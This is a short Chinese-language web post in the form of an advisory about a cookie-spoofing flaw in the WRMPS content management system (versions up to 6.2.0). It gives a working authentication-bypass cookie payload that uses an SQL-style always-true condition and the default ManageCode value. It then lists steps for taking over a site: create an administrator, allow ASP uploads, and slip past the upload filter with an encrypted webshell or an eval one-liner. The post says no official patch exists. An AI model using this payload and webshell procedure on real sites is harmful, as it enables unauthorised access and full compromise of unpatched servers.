网人信息发布系统(WRMPS) COOKIE欺骗漏洞

发表评论 (0) 查看评论
影响版本:
WRMPS =< v 6.2.0
漏洞描述:
WRMPS 是一个高效的内容管理解决方案,是数十万地方生活门户、行业门户及分类信息站点首选技术品牌!COOKIE欺骗进后台

admin/admin_main.asp or admin/admin_menu.asp
admin=ManageCode=WRMPS6&admin=a' or '1'='1&pass=a' or '1'='1&flag=,&FlagGroup=0

有些后台不需要认证码 ManageCode=   默认WRMPS6  , 如果改了就只能猜了.进了后台,添加管理员,添加上传类型ASP, 上传过滤了某些特殊代码,wscript.shell,execute之类的,直接传加密的马或者传eval的一句话就可以了.
<*参考

http://wolfexp.net/forum/viewthread.php?tid=7470&extra=page%3D1

*>

暂无,等待官方补丁
http://www.wangren.net/
发表评论?

0 条评论。

发表评论